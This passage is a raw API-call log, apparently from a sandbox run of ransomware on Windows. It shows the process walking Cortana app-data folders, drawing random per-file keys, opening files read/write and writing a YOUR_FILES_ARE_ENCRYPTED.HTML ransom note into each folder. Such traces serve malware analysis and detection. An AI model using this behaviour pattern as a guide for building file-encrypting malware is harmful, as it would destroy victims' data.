PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.180] SystemFunction036 (in: RandomBuffer=0x19db44, RandomBufferLength=0x20 | out: RandomBuffer=0x19db44) returned 1 [0119.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0119.180] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19db68 | out: lpFileSize=0x19db68*=0) returned 1 [0119.180] CloseHandle (hObject=0x32c) returned 1 [0119.181] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6e134a22, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e134a22, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e134a22, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0119.181] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.181] wnsprintfW (in: pszDest=0x3104fd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 139 [0119.181] GetProcessHeap () returned 0x600000 [0119.181] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3114fd8 [0119.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\c1j92j4x\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.182] WriteFile (in: hFile=0x324, lpBuffer=0x3114fd8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x3114fd8*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0119.183] CloseHandle (hObject=0x324) returned 1 [0119.183] GetProcessHeap () returned 0x600000 [0119.183] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3114fd8 | out: hHeap=0x600000) returned 1 [0119.183] GetProcessHeap () returned 0x600000 [0119.183] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.185] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6e134a22, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e134a22, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e134a22, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0119.185] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.185] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\container.dat") returned 114 [0119.185] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.185] lstrlenW (lpString=".dat") returned 4 [0119.185] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.185] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0119.186] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=0) returned 1 [0119.186] CloseHandle (hObject=0x324) returned 1 [0119.186] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6e134a22, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e134a22, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e134a22, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0119.186] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.186] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0119.186] GetProcessHeap () returned 0x600000 [0119.186] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.187] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.188] CloseHandle (hObject=0x320) returned 1 [0119.188] GetProcessHeap () returned 0x600000 [0119.188] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.188] GetProcessHeap () returned 0x600000 [0119.188] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.188] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6064f492, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x15392beb, ftLastAccessTime.dwHighDateTime=0x1d705f0, ftLastWriteTime.dwLowDateTime=0x15392beb, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0119.188] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.188] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache") returned 101 [0119.188] GetProcessHeap () returned 0x600000 [0119.188] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.189] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache" [0119.189] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\*" [0119.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6064f492, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x15392beb, ftLastAccessTime.dwHighDateTime=0x1d705f0, ftLastWriteTime.dwLowDateTime=0x15392beb, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.190] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6064f492, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x15392beb, ftLastAccessTime.dwHighDateTime=0x1d705f0, ftLastWriteTime.dwLowDateTime=0x15392beb, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="..", cAlternateFileName="")) returned 1 [0119.191] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6f7db06f, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f7db06f, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f7db06f, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0119.191] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.191] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\container.dat") returned 115 [0119.191] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.191] lstrlenW (lpString=".dat") returned 4 [0119.191] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.191] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inetcache\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0119.191] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=0) returned 1 [0119.191] CloseHandle (hObject=0x324) returned 1 [0119.191] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6f7db06f, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f7db06f, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f7db06f, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0119.191] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.191] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0119.191] GetProcessHeap () returned 0x600000 [0119.191] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.192] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.193] CloseHandle (hObject=0x320) returned 1 [0119.193] GetProcessHeap () returned 0x600000 [0119.193] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.193] GetProcessHeap () returned 0x600000 [0119.193] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.193] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6064f492, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x7587a14, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x7587a14, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d7aa, dwReserved1=0x315d6f8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0119.193] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.193] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies") returned 103 [0119.193] GetProcessHeap () returned 0x600000 [0119.193] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.193] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies" [0119.193] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\*" [0119.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6064f492, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x7587a14, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x7587a14, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName=".", cAlternateFileName="")) returned 0x626838 [0119.193] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6064f492, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x7587a14, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x7587a14, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="..", cAlternateFileName="")) returned 1 [0119.193] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x702233ae, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x702233ae, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x702233ae, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x65, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="3K9L6W4M.txt", cAlternateFileName="")) returned 1 [0119.193] StrStrIW (lpFirst="3K9L6W4M.txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.193] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\3K9L6W4M.txt") returned 116 [0119.193] PathFindExtensionW (pszPath="3K9L6W4M.txt") returned=".txt" [0119.194] lstrlenW (lpString=".txt") returned 4 [0119.194] PathFindExtensionW (pszPath="3K9L6W4M.txt") returned=".txt" [0119.194] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\3K9L6W4M.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inetcookies\\3k9l6w4m.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0119.195] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=101) returned 1 [0119.195] CloseHandle (hObject=0x324) returned 1 [0119.195] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6e10e7a9, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6e10e7a9, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6e10e7a9, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0119.195] StrStrIW (lpFirst="container.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.195] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\container.dat") returned 117 [0119.195] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.195] lstrlenW (lpString=".dat") returned 4 [0119.195] PathFindExtensionW (pszPath="container.dat") returned=".dat" [0119.195] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\container.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inetcookies\\container.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0119.195] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=0) returned 1 [0119.195] CloseHandle (hObject=0x324) returned 1 [0119.196] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x757ddbc, ftCreationTime.dwHighDateTime=0x1d70503, ftLastAccessTime.dwLowDateTime=0x757ddbc, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x757ddbc, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x1c4, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="M2R62F58.txt", cAlternateFileName="")) returned 1 [0119.196] StrStrIW (lpFirst="M2R62F58.txt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.196] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\M2R62F58.txt") returned 116 [0119.196] PathFindExtensionW (pszPath="M2R62F58.txt") returned=".txt" [0119.196] lstrlenW (lpString=".txt") returned 4 [0119.196] PathFindExtensionW (pszPath="M2R62F58.txt") returned=".txt" [0119.196] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\M2R62F58.txt" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inetcookies\\m2r62f58.txt"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0119.196] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=452) returned 1 [0119.196] CloseHandle (hObject=0x324) returned 1 [0119.196] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x757ddbc, ftCreationTime.dwHighDateTime=0x1d70503, ftLastAccessTime.dwLowDateTime=0x757ddbc, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x757ddbc, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x1c4, dwReserved0=0x63d090, dwReserved1=0x315d700, cFileName="M2R62F58.txt", cAlternateFileName="")) returned 0 [0119.196] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0119.196] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0119.196] GetProcessHeap () returned 0x600000 [0119.196] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.198] WriteFile (in: hFile=0x320, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.199] CloseHandle (hObject=0x320) returned 1 [0119.199] GetProcessHeap () returned 0x600000 [0119.199] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.199] GetProcessHeap () returned 0x600000 [0119.199] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.199] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6064f492, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6064f492, ftLastAccessTime.dwHighDateTime=0x1d70068, 